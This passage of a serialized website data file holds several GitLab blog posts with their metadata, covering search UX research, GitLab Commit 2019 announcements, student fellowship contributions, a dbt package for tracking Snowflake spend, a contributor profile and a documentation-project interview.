Lokalise","en-us/blog/lessons-weet-learned-lokalise.yml","en-us/blog/lessons-weet-learned-lokalise",{"_path":3685,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3686,"content":3692,"config":3698,"_id":3700,"_type":14,"title":3701,"_source":16,"_file":3702,"_stem":3703,"_extension":19},"/en-us/blog/lets-all-search",{"title":3687,"description":3688,"ogTitle":3687,"ogDescription":3688,"noIndex":6,"ogImage":3689,"ogUrl":3690,"ogSiteName":673,"ogType":674,"canonicalUrls":3690,"schema":3691},"Let's all search!","We spoke with you about our search tools. 
Now we've got some issues we'd like your help on.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679339/Blog/Hero%20Images/AdvancedSearch.png","https://about.gitlab.com/blog/lets-all-search","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Let's all search!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Will Leidheiser\"}],\n        \"datePublished\": \"2022-12-01\",\n      }",{"title":3687,"description":3688,"authors":3693,"heroImage":3689,"date":3695,"body":3696,"category":10,"tags":3697},[3694],"Will Leidheiser","2022-12-01","\n\nEarlier this year, our research team set out to learn how users search for GitLab content and to better understand their experience with our [global search](https://docs.gitlab.com/ee/user/search/) and [advanced search](https://docs.gitlab.com/ee/user/search/advanced_search.html) tools. We spoke with 12 GitLab users individually over the course of a four-week span to get their [feedback on our search capabilities](https://gitlab.com/groups/gitlab-org/-/epics/8193). \n\n![Getting feedback from GitLab users](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Talking_to_GitLab_users.png){: .shadow.medium.center}\nA researcher talking with GitLab users to gather their feedback.\n{: .note.text-center}\n\n## Research insights\n\nOur research identified that the discoverability of our search could be better. Some users had never tried out our search capabilities because they did not know we had a search bar inside of GitLab. The search bar [did not visually stand out](https://gitlab.com/groups/gitlab-org/-/epics/8275) to some GitLab users, so this led them to try other means (e.g., using their web browser URL history or using another external application) to find content. 
In addition, we learned that even long-time users of the GitLab search bar were [unaware of the kinds of content it could find](https://gitlab.com/groups/gitlab-org/-/epics/8274). As we encouraged users to try out the search tools for our study, they would uncover new information either through exposure or by reading our documentation.\n\nOur research helped the Global Search Product team at GitLab with future roadmap planning. Now, we need the support of our community to make iterative improvements to GitLab search tools. We have identified **two** actionable insight issues that you can contribute to directly to improve the search experience for all GitLab users. \n\n## Community contribution issues\n\n- In order to make the search bar stand out, we're proposing a change to [improve the contrast of the search bar](https://gitlab.com/gitlab-org/gitlab/-/issues/330925) in the GitLab navigation header. This change would greatly support the accessibility of our site and would assist users when looking for a way to search for content.\n\n![Update to improve the contrast of our search bar](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Focus.png){: .shadow.medium.center}\nA visual mock-up of improved contrast for the GitLab search bar.\n{: .note.text-center} \n\n- Improve the search experience by [providing hints](https://gitlab.com/gitlab-org/gitlab/-/issues/364402) about the kinds of content that the GitLab search bar can find. This change would prompt users with different ideas of what they can do with the search bar, so they can learn about our functionality without having to read through documentation.\n\n![Hints in the search bar](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Placeholder_Options.png){: .shadow.medium.center}\nSome examples of hints that would be shown in the GitLab search bar.\n{: .note.text-center}\n\n## Let's contribute\n\nWondering where to start? 
Check out [this blog post](/blog/first-time-open-source-contributor-5-things-to-get-you-started) and [our development guide](/community/contribute/development/) and become an all-star contributor!\n\nNeed guidance or help? Feel free to leave a comment directly on one of the issues linked above, or find support in the \"get help\" section [in our contributing guide](/community/contribute/#getting-help).\n\n**Let's all contribute to GitLab's search!**\n",[708,267,9,729,730],{"slug":3699,"featured":6,"template":689},"lets-all-search","content:en-us:blog:lets-all-search.yml","Lets All Search","en-us/blog/lets-all-search.yml","en-us/blog/lets-all-search",{"_path":3705,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3706,"content":3712,"config":3717,"_id":3719,"_type":14,"title":3720,"_source":16,"_file":3721,"_stem":3722,"_extension":19},"/en-us/blog/live-from-commit-news",{"title":3707,"description":3708,"ogTitle":3707,"ogDescription":3708,"noIndex":6,"ogImage":3709,"ogUrl":3710,"ogSiteName":673,"ogType":674,"canonicalUrls":3710,"schema":3711},"At GitLab Commit, our product roadmap, new partners, and a new milestone","Live from GitLab Commit: what’s next for our product strategy, expanded partnerships, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664134/Blog/Hero%20Images/gitlabcommitbrooklyn.png","https://about.gitlab.com/blog/live-from-commit-news","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"At GitLab Commit, our product roadmap, new partners, and a new milestone\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-09-17\",\n      }",{"title":3707,"description":3708,"authors":3713,"heroImage":3709,"date":3714,"body":3715,"category":299,"tags":3716},[1273],"2019-09-17","\nOur first ever user conference – GitLab Commit in Brooklyn – has only been under way for a few hours and we’ve 
already made a number of key announcements. Not only did we secure an additional [$268 million in Series E funding](/blog/gitlab-series-e-funding/) to power our DevOps journey forward, we’ve also strengthened key partnerships, hit new milestones, and released details about important new features in the product.\n\n## GitLab is for everyone\n\nIn the next few releases, look for GitLab to add advanced integration with the [Amazon Elastic Kubernetes](https://aws.amazon.com/eks/) service (EKS), something our CEO [Sid Sijbrandij](/company/team/#sytses) told the audience during his keynote at Commit. Sid also said the number of customers using GitLab with [Terraform by HashiCorp](/blog/gitlab-hashicorp-terraform-vault-pt-1/) is increasing at an exciting rate. This Ops-focused solution leverages GitLab’s CI/CD automated pipelines to better achieve infrastructure as code, a.k.a. GitOps. Lastly, later this year, look out for GitLab to integrate with HashiCorp’s very popular [Vault Project](https://www.vaultproject.io/docs/internals/security.html) that will protect secrets throughout the pipeline.\n\nMoving forward, Sid stressed that we believe everyone has a seat at the table. \"We will make our vision of a complete DevSecOps a reality for each and every one of you,\" says Sid.\n\nAnd for those who’ve been hoping for auto remediation, it’s coming, says [Mark Pundsack](/company/team/#markpundsack), vice president of product strategy, during his keynote. There is work to be done but the vision is clear: Necessary but repetitive security work will be automated in the near future.\n\nThat’s not the end, however. Mark outlined a future where operations and security teams have their own customized dashboards on GitLab, giving them access to the same information as developers. “A ton of people are involved with the development and delivery of software,” says Mark. 
“That is the ultimate GitLab vision: Where every knowledge worker involved with software development and delivery uses a single application so they are on the same page with the rest of their team members.” Ultimately GitLab will expand to the business side, bringing project managers, designers, legal, and executives into the mix. Mark’s final message: “GitLab is for everyone.”\n\n## GitLab & VMWare\n\n[GitLab and VMWare](https://www.globenewswire.com/news-release/2019/09/17/1916738/0/en/GitLab-to-Enable-Cloud-Native-Transformation-on-VMware-Cloud-Marketplace.html) announced a collaboration making [GitLab now available on the VMWare Cloud marketplace](https://about.gitlab.com/2019-09-17-gitlab-on-vmware-cloud-marketplace/). Development teams will be able to deploy and run [GitLab Enterprise (Core)](/pricing/) on their VMWare environments with just a few clicks. GitLab is packaged and supported by Bitnami which provides curated applications for the VMWare marketplace. GitLab also supports [“Continuous Verification”](https://thenewstack.io/how-continuous-security-can-solve-the-cloud-protection-conundrum/) by integrating with VMWare Secure State, Wavefront by VMWare, and CloudHealth.\n\n## KDE chooses GitLab\n\nKDE, an international technology community creating free and open source software for desktop and portable computing, [chose GitLab](https://www.globenewswire.com/news-release/2019/09/17/1916731/0/en/GitLab-Adopted-by-KDE-to-Foster-Open-Source-Contributions.html) for its developers. The KDE team wants to offer additional infrastructure support and thinks GitLab will help boost development momentum.\n\nThe KDE community is one of the largest free software communities with more than 2,600 contributors. Now they’ll have access to an even wider range of development and code review features with GitLab’s DevOps platform to complement their tools currently in use. 
The KDE community will have additional options for accessible infrastructure for contributors, code review integration with Git, streamlined infrastructure and tooling, and an open communication channel with the upstream GitLab community.\n\n## Forbes 2019 Cloud 100\n\nWe’re pretty excited to mention we’ve been named to the [Forbes 2019 Cloud 100](https://www.forbes.com/sites/mnunez/2019/09/11/a-truck-tracker-a-coder-toolbox-and-a-unicorn-from-down-under-inside-this-years-cloud-100/#6148bcad5653), the definitive ranking of the top 100 private cloud companies in the world, published by Forbes in partnership with Bessemer Venture Partners and Salesforce Ventures. We’re the only cloud-agnostic DevOps platform, and [we came in at number 32](https://about.gitlab.com/2019-09-11-gitlab-named-leader-in-forbes-cloud-100-list/)!\n\nIf you like what you’re hearing out of GitLab Commit Brooklyn, then join us at our next [GitLab Commit in London](/events/commit/#) on October 9.\n",[267,277,9,1721,1376],{"slug":3718,"featured":6,"template":689},"live-from-commit-news","content:en-us:blog:live-from-commit-news.yml","Live From Commit News","en-us/blog/live-from-commit-news.yml","en-us/blog/live-from-commit-news",{"_path":3724,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3725,"content":3731,"config":3737,"_id":3739,"_type":14,"title":3740,"_source":16,"_file":3741,"_stem":3742,"_extension":19},"/en-us/blog/major-league-gitlab-hacking",{"title":3726,"description":3727,"ogTitle":3726,"ogDescription":3727,"noIndex":6,"ogImage":3728,"ogUrl":3729,"ogSiteName":673,"ogType":674,"canonicalUrls":3729,"schema":3730},"Major League Hacking: Students contribute to feature updates","Our latest program participants explain their projects, their results, and the lessons they learned.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663736/Blog/Hero%20Images/a-deep-dive-into-the-security-analyst-persona.jpg","https://about.gitlab.com/blog/major-league-gitlab-hacking","\n      
                  {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Major League Hacking: Student fellows contribute to platform feature updates\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-05-30\",\n      }",{"title":3732,"description":3727,"authors":3733,"heroImage":3728,"date":3734,"body":3735,"category":10,"tags":3736},"Major League Hacking: Student fellows contribute to platform feature updates",[2909],"2023-05-30","\n\nContributing to [open source](https://go.gitlab.com/spHNym) projects [like GitLab](https://gitlab.com/gitlab-org) can be a powerful way to learn software development. Just ask [Mughees Pervaiz](https://gitlab.com/Mughees_), who is studying computer science at the University of South Asia, and [Young Jun Joo](https://gitlab.com/youngjun827), who is studying mathematics and economics at the University of Waterloo in Canada. They recently contributed to GitLab as part of a fellowship with [Major League Hacking](https://mlh.io/about), a Certified B corporation working to empower tomorrow's technology leaders. The fellows' [12-week program recently concluded](https://fellowship.mlh.io/), but before it was over, we gave them one final assignment: Explain your favorite contribution to GitLab during your fellowship.\n\nHere's what they had to say.\n\n## Mughees Pervaiz\nDuring my internship, I was a part of the GitLab Foundation team under the mentorship of our maintainer, [James Rushford](https://gitlab.com/jrushford). My primary responsibility was to improve both the developer and user experience on GitLab. \n\nMy favorite contribution was helping to update expand/collapse buttons in roadmaps [from link buttons to tertiary buttons](https://gitlab.com/gitlab-org/gitlab/-/issues/396775). Before the changes, the feature was using old components, and I updated it to new GitLab UI components. 
We had to [migrate the expand/collapse buttons](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/117242) that appear in the roadmap tree drawer. So we were working with the tree view (or, you could say, the 'child components' of the roadmap) and, because of this, it was very difficult for me to find the right file from GitLab's very large codebase.\n\nMaking this contribution taught me a lot about working with the GitLab codebase — specifically about making changes to the front-end user interface. I had to work with different GitLab components, such as the epic item details (vue component), epic item details (js component), and the front-end JavaScript libraries such as [Jest](https://jestjs.io/), in order to test or implement this feature.\n\nThis contribution also helped me develop my collaboration and communication skills. I had to work closely with other members of the GitLab community, including designers, product managers, and other contributors, in order to refine the feature and ensure that it aligned with GitLab's design principles and user experience goals.\n\nI also learned not to jump into coding without understanding an issue completely. Here, James helped me quite a bit: When I asked for his guidance, he responded with the following questions:\n\n- What is your understanding of the problem?\n- What did you try so far?\n- What did you find so far?\n- What are your next ideas?\n- Where did you look for information?\n\nAt first, I was confused. *Why is he asking me these questions instead of helping me?* But following James' technique really helped me with the issue, and I solved the problem by myself. At that moment, one of the most important lessons was clear to me: Don't underestimate myself. James wanted me to go beyond my limits, get out of the box, and try to solve the issue by myself so I could have a better understanding of what was happening in the codebase. 
So to anyone wishing to contribute to GitLab, I would say: Believe in yourself and give your best, and make sure you read the issue closely to develop a good understanding of the problem you're trying to solve.\n\n## Young Jun Joo\nDuring my Major League Hacking fellowship with GitLab, I worked on [improving the GitLab search function](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/111741). Some GitLab users were experiencing a slow search experience — and as a user myself, I understood the importance of having a quick and efficient search function. I wanted to help make that a reality for other users.\n\nSo I [implemented a memoization algorithm](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/112606) that caches search results. Now, if a user searches for the same word multiple times, the search results will be retrieved from the cache instead of being recalculated each time. This results in a faster and more efficient search experience for GitLab users.\n\nMy contribution to GitLab was significant because it improved the search function's performance and efficiency, making it more reliable and user-friendly. Working on this project taught me a lot about optimization and efficiency in software development. I also gained a deeper understanding of how memoization algorithms work and how they can be used to improve performance.\n\nMy work on this project not only was extremely rewarding but also had a positive impact on GitLab and its users, who can now quickly and easily search for the information they need without experiencing lag or delays. I'm proud to have made a meaningful contribution to such a valuable tool for software development, and grateful for the opportunity to have worked with such a talented team of developers.\n\n## Your turn\nWant to improve your open source development skill by contributing to GitLab? 
You can start right now by reviewing the project's [list of outstanding issues](https://gitlab.com/groups/gitlab-org/-/issues/?sort=created_date&state=opened&label_name%5B%5D=quick%20win&first_page_size=100) (hint: start with issues labeled `quick win`). And be sure to connect with our [community on Discord](https://discord.gg/gitlab). We'd love to meet you.\n",[9,267,1099],{"slug":3738,"featured":6,"template":689},"major-league-gitlab-hacking","content:en-us:blog:major-league-gitlab-hacking.yml","Major League Gitlab Hacking","en-us/blog/major-league-gitlab-hacking.yml","en-us/blog/major-league-gitlab-hacking",{"_path":3744,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3745,"content":3751,"config":3758,"_id":3760,"_type":14,"title":3761,"_source":16,"_file":3762,"_stem":3763,"_extension":19},"/en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt",{"title":3746,"description":3747,"ogTitle":3746,"ogDescription":3747,"noIndex":6,"ogImage":3748,"ogUrl":3749,"ogSiteName":673,"ogType":674,"canonicalUrls":3749,"schema":3750},"How to manage your Snowflake spend with Periscope and dbt","The GitLab data team is open sourcing the dbt package they use to manage their Snowflake spend.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670255/Blog/Hero%20Images/data-servers.jpg","https://about.gitlab.com/blog/managing-your-snowflake-spend-with-periscope-and-dbt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to manage your Snowflake spend with Periscope and dbt\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor Murphy\"},{\"@type\":\"Person\",\"name\":\"Emilie Schario\"}],\n        \"datePublished\": \"2019-08-26\",\n      }",{"title":3746,"description":3747,"authors":3752,"heroImage":3748,"date":3755,"body":3756,"category":10,"tags":3757},[3753,3754],"Taylor Murphy","Emilie Schario","2019-08-26","\nOn the data team at GitLab, we are grateful to 
be empowered with best in-class tools that enable us to produce high-quality work. At the 2018 DataEngConf (now Data Council), GitLab data engineer [Thomas La Piana](/company/team/#tlapiana) spoke about how a team of three was supporting the data needs of a billion-dollar company. As he explains in this talk, we focus a lot on processes and workflows.\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/eu623QBwakc\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\n## Where are the existing gaps?\nToday, the data team has grown from three to seven: three engineers and four analysts.\nSince we've more than doubled in the last six months, we've had to take a step back and revisit our processes.\n\n![GitLab Team Headcount](https://about.gitlab.com/images/blogimages/team_headcount.png){: .shadow.medium.center}\nThe GitLab team has grown significantly in the past few months.\n{: .note.text-center}\n\n### GitLab is growing fast\n\nDespite the significant jump in the data team's headcount, our growth has not matched the exponential growth of the team supporting GitLab.\nAs GitLab grows, more folks aim to include more data in their decision-making process.\nThis means we're iterating quickly, collecting feedback, and constantly improving on the quality of the analyses we are producing for our business stakeholders.\nThe demand for more data means there is a lot more to accomplish – making now an opportune time to review our processes and improve the data team's impact across GitLab.\n\nFor example, a data team member pointed out that refinement isn't a part of our [milestone planning process](/handbook/business-technology/data-team/how-we-work/#milestone-planning).\nNo wonder our backlog wasn't moving anywhere! 
We identified the root of the problem by asking our team, \"What is the problem we're trying to solve?\" and then laid out a plan to address it.\n\n### Onboarding can be hard\n\nWe've made some great data analyst hires recently!\nWe don't require our new team members to be familiar with our existing data stack (Stitch/Singer - Snowflake - dbt - Periscope), but we do require them to have technical skills that match their role.\nThis usually includes Git, SQL, and Python (Pandas) at the bare minimum, though we welcome R (tidyverse) as well.\nWhile onboarding at any company can be difficult, it's especially challenging in an all-remote organization such as GitLab.\n\nIn addition to introducing candidates to our specific technologies, part of the [data analyst onboarding](https://gitlab.com/gitlab-data/analytics/blob/master/.gitlab/issue_templates/data_onboarding.md) includes a unit on resource consumption.\nWe spend time introducing the concepts of databases and warehouses in Snowflake, because storage and compute being separate are often novel ideas to folks joining GitLab from an on-premise data organization.\nIn some cases, we are teaching our new hires a new way to think about the data-related problems they're solving, and introducing different resources to remedy these problems.\n\n### With great power comes great responsibility\n\nWe consume more resources as the data team headcount grows. I think about this like folks using water in a household. If everyone is on vacation, the water bill will be low, but if all the cousins come visit for a week, the bill will be high.\nSimilarly to why we encourage a big group of visiting relatives to take shorter showers to conserve water, on the data team we work to steward resources effectively. 
This means we must identify wasted resources to recapture them.\nIt's important that our operating expenses not balloon with headcount.\n\n## Are you protected against a leak?\n\nAs a homeowner, I can share a myriad of appliance-gone-wrong stories, but one tops them all: the time there was a leak in our front yard that we only discovered because of a $1,000 water bill.\nOften, homeowners can only measure water usage when the bill arrives, when it's always too late to fix it.\n\nLucky for our team and yours, Snowflake is much more generous than my water company.\nWe *can* monitor our costs as they accrue.\nAfter having this process in place for a bit now, we'd encourage you to implement it in your stack.\n\n## Monitor your Snowflake spend with dbt and Periscope\n\nWe're excited to make our [Snowflake spend dbt package](https://gitlab.com/gitlab-data/snowflake_spend) widely available for use.\nDoing this is in line with our belief in the value of [open source analytics](/blog/open-source-analytics/).\n\nTo get started, you'll need to grant access to the `snowflake` database to your dbt-specific role with:\n```\nGRANT IMPORTED PRIVILEGES ON DATABASE snowflake TO ROLE \u003Crole>;\n```\n\nThen you'll need to update the `packages.yml` file in your dbt project to include the following:\n```\npackages:\n  - git: https://gitlab.com/gitlab-data/snowflake_spend.git\n    revision: v1.0.0\n```\n\nToday, you can only install the package directly from Git.\nSince it doesn't depend on any other packages, you don't have to worry about version management, so this should not cause any problems.\nYou can run `dbt deps` to ensure the package is installed correctly.\n\nYou will need a csv called `snowflake_contract_rates.csv` which has two columns: effective date and rate. The effective date is the day the new contracted rate started and it should be in YYYY-MM-DD format. The rate is the per credit price for the given time period. 
You can see how the data team configures [their csv file](https://gitlab.com/gitlab-data/analytics/blob/master/transform/snowflake-dbt/data/snowflake_contract_rates.csv). You will need to run `dbt seed` for the csv to be loaded as a table and for the model to run successfully.\n\nFinally, you will need to update your `dbt_project.yml` file to enable this package with the following block.\n```\nmodels:\n  snowflake_spend:\n    enabled: true\n```\nYou can see [how the data team has configured the package](https://gitlab.com/gitlab-data/analytics/blob/master/transform/snowflake-dbt/dbt_project.yml#L68) in our `dbt_project.yml` file.\n\nRunning `dbt compile` will not only test that you've configured all of this correctly, but also will compile the files in the `analysis` directory. These are the queries that we use to underlie the exact Periscope dashboard that we have automatically posted in Slack every day.\n\n![GitLab's Periscope dashboard for managing Snowflake spend](https://about.gitlab.com/images/blogimages/periscope_snowflake_spend1.png){: .shadow.medium.center}\n![GitLab's Periscope dashboard for managing Snowflake spend](https://about.gitlab.com/images/blogimages/periscope_snowflake_spend2.png){: .shadow.medium.center}\n\nOnce you've set up this dashboard, you can configure it to auto-refresh daily.\nThen use Slack's `/remind app.periscopedata.com/dashboardurl` to have it regularly publish in the channel of your choice.\n\nYou can see how our resource management initiatives have been effective.\nWe hope you'll find monitoring a key step to helping manage your own Snowflake spend.\n\nHave any thoughts, questions, or suggestions? 
[Create an issue](https://gitlab.com/gitlab-data/snowflake_spend/issues).\n\nPhoto by [Taylor Vick](https://unsplash.com/photos/M5tzZtFCOfs) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[779,267,9,1721],{"slug":3759,"featured":6,"template":689},"managing-your-snowflake-spend-with-periscope-and-dbt","content:en-us:blog:managing-your-snowflake-spend-with-periscope-and-dbt.yml","Managing Your Snowflake Spend With Periscope And Dbt","en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt.yml","en-us/blog/managing-your-snowflake-spend-with-periscope-and-dbt",{"_path":3765,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3766,"content":3771,"config":3775,"_id":3777,"_type":14,"title":3778,"_source":16,"_file":3779,"_stem":3780,"_extension":19},"/en-us/blog/marcel-amirault-contributor-post",{"title":3767,"description":3768,"ogTitle":3767,"ogDescription":3768,"noIndex":6,"ogImage":1192,"ogUrl":3769,"ogSiteName":673,"ogType":674,"canonicalUrls":3769,"schema":3770},"GitLab Code Contributor: Marcel Amirault","Recent MVP Marcel Amirault shares why he started contributing to GitLab.","https://about.gitlab.com/blog/marcel-amirault-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Marcel Amirault\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-04-12\",\n      }",{"title":3767,"description":3768,"authors":3772,"heroImage":1192,"date":2408,"body":3773,"category":10,"tags":3774},[704],"\n\nI'm excited to continue the [series of GitLab contributor blog posts](/blog/tags.html#contributors)\nwith [Marcel Amirault](https://gitlab.com/Ravlen), [the MVP for the 11.9 release](/community/mvp/).\nLet's get to know more about him!\n\n### Can you tell us where you live and share anything interesting about your area?\n\nI'm originally from Halifax, in eastern Canada, but I now live in 
[Kagoshima, Japan](https://www.google.com/maps/place/Kagoshima,+Japan/@31.523208,130.2782569,10z/data=!3m1!4b1!4m5!3m4!1s0x353e615200e3c53d:0x9adcfdad5d5c5885!8m2!3d31.5968539!4d130.5571392) (and yes, I have seen wild tanuki!).\nKagoshima is famous for being right next to one of the world's most active volcanos, Sakurajima,\nwhich regularly dusts the city in ash. You have to keep an eye on the wind before you decide\nto put out your laundry, or else you'll have some ashy-grey clothes pretty quickly.\nIt's also known for inspiring some famous movies. Hometown hero Saigō Takamori and the\nlocal Satsuma clan were the inspirations for \"The Last Samurai,\" and Yakushima Island was\nthe inspiration for the forest in \"Princess Mononoke.\"\n\n![Picture of Sakurajima](https://about.gitlab.com/images/blogimages/Marcel-blogpost/kagoshima.png){: .shadow.small.center}\n*\u003Ccenter>\u003Csmall>Sakurajima in the distance\u003C/small>\u003C/center>*\n\n### Can you tell us what you do professionally?\n\nOriginally, I worked in IT Support, peaking as a Network Technician at a telecom company\nin eastern Canada. I loved the job, but I wanted to live abroad for a while before settling into my career.\nI decided to teach English in Japan \"for six months,\" but fell in love with the country and have\nbeen here ever since. I currently teach English as a second language to Japanese students, and\nhave taught all ages and types of students over the years. I write, proofread, and teach curricula\nfor various types of students, ranging from people preparing for their first trip abroad, to seminars\nin hospitals for medical professionals. 
From time to time I proofread documents brought to me,\nsuch as applications to international programs, or scientific papers being prepared for submission for peer review.\n\n![Marcel in the classroom](https://about.gitlab.com/images/blogimages/Marcel-blogpost/marcel-teaching.jpg){: .shadow.small.center}\n\n### When did you first contribute to GitLab and why did you decide to contribute?\n\nAbout a year ago, I started a Rails course to try to get back into the IT world, and needed to\nchoose a place to store my Git repo. A friend suggested GitLab, and I dove right in.\nWhile reading the documentation, I sometimes found small mistakes that the English teacher\nin me couldn't ignore, so I started submitting MRs for small things like typos or obvious grammar mistakes.\nIn fact, [my first MR](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/11848) was to correct grammar.\nFrom there, the MRs got a little bigger, and a little more involved, and it's something I enjoy doing when things are slow at work.\n\n### What was the most difficult part of contributing for you in the beginning?\n\nThere was no significant hurdle to starting, because contributing to documentation was not\nintimidating at all, and I never had to worry about complicated reviews.\nWhen I first submitted a small change to the language in a section of the UI though, I suddenly\nhad a lot of reviews and suggestions, and started to realize how a small change could have a large impact.\nUnderstanding the impact that one person could have on a major project was something I had to learn.\nThankfully, a lot of GitLab team-members offered help and explained things for me, which I really appreciated.\n\n### Which areas of GitLab have you contributed to most and how do you find issues that you want to work on?\n\nUpdating technical documentation was a natural fit for me. 
I enjoy learning, so I frequently\nread the GitLab documentation, but my \"English teacher eyes\" can't ignore language that can be improved.\nI take advantage of free time at work, and I'm fortunate to have free access to computers and\na flexible boss (as long as my lesson quality is maintained). As a result, I'm often able to fill\nthe gaps between lessons by working on documentation issues. When I'm struggling to stay\nawake because my kids kept me up at night and I have a gap in my schedule, working on an\ninteresting bit of documentation wakes me up as much as a strong cup of coffee!\nI usually find documentation that can be improved on my own as I read through, but I\nsometimes search for [`Accepting Merge Requests` issues for Documentation](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Accepting%20merge%20requests&label_name[]=Documentation) if I need a new project to work on. Recently I have given myself \"challenges,\"\nlike \"Find ALL examples of a certain grammar mistake project wide, and fix them\" or\n\"Find ALL examples where CE and EE documentation have diverged accidentally, and realign them when possible.\"\n\n### What do you enjoy doing when you're not working?\n\nI like doing home improvements when I can, and really like outdoor carpentry like putting up\nfences or wooden decks. I'm a big fan of hiking and camping, but it has been hard to get out\nto camping places in the past few years as my kids are still young. We are hoping to bring them\non their second ever camping trip this spring/summer. Finally, my friends and I try to get together\nabout once every month or two for poker or board gaming. 
Some of my favorite games are\nSettlers of Catan, Carcassonne, Puerto Rico, Pandemic, San Juan, and Guillotine.\n\n![Marcel and his children](https://about.gitlab.com/images/blogimages/Marcel-blogpost/marcel-family.png){: .shadow.small.center}\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nDon't be shy! If you are worried about your contribution, feel free to make your MR a [draft](https://docs.gitlab.com/ee/user/project/merge_requests/drafts.html)\n(document last updated by me! 😉), and ask for help. Everyone is super friendly and always willing to give advice!\n\n### Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn\nhow you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":3776,"featured":6,"template":689},"marcel-amirault-contributor-post","content:en-us:blog:marcel-amirault-contributor-post.yml","Marcel Amirault Contributor Post","en-us/blog/marcel-amirault-contributor-post.yml","en-us/blog/marcel-amirault-contributor-post",{"_path":3782,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3783,"content":3789,"config":3794,"_id":3796,"_type":14,"title":3797,"_source":16,"_file":3798,"_stem":3799,"_extension":19},"/en-us/blog/meet-partner-the-good-docs-project",{"title":3784,"description":3785,"ogTitle":3784,"ogDescription":3785,"noIndex":6,"ogImage":3786,"ogUrl":3787,"ogSiteName":673,"ogType":674,"canonicalUrls":3787,"schema":3788},"How The Good Docs Project uses GitLab for documentation as code and more","In this video interview, meet our new Open Source Partner, The Good Docs Project, and learn about the benefits they are extracting from the DevSecOps 
platform.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682841/Blog/Hero%20Images/documentation1.jpg","https://about.gitlab.com/blog/meet-partner-the-good-docs-project","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How The Good Docs Project uses GitLab for documentation as code and more\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-07-06\",\n      }",{"title":3784,"description":3785,"authors":3790,"heroImage":3786,"date":3791,"body":3792,"category":10,"tags":3793},[2909],"2023-07-06","\n\n[The Good Docs Project](https://thegooddocsproject.dev/welcome/) wants to help improve software documentation across the entire [open source](https://go.gitlab.com/spHNym) ecosystem. The community provides templates and other resources to help open source developers write, maintain, and improve project documentation. Last year, they voted to migrate to GitLab. 
Since then, they've discovered how using an all-in-one DevSecOps platform can streamline and accelerate work in open source communities like theirs.\n\nThey've now joined the [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community, and they're sharing their knowledge and resources with other open source projects also using GitLab to build a world where anyone can contribute.\n\nI sat down with some community members from The Good Docs Project to learn what brought them together, what motivates their work, and where they're headed next.\n\nIn this interview, you'll learn:\n* How switching to GitLab enabled an open source project to unify planning, development, and testing work onto a single platform\n* How a community of technical writers and editors uses GitLab to develop documentation as code\n* How an open source project built community-focused git toolchain training on GitLab\n\n### Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/Bek7vLmNmME\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\n\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. 
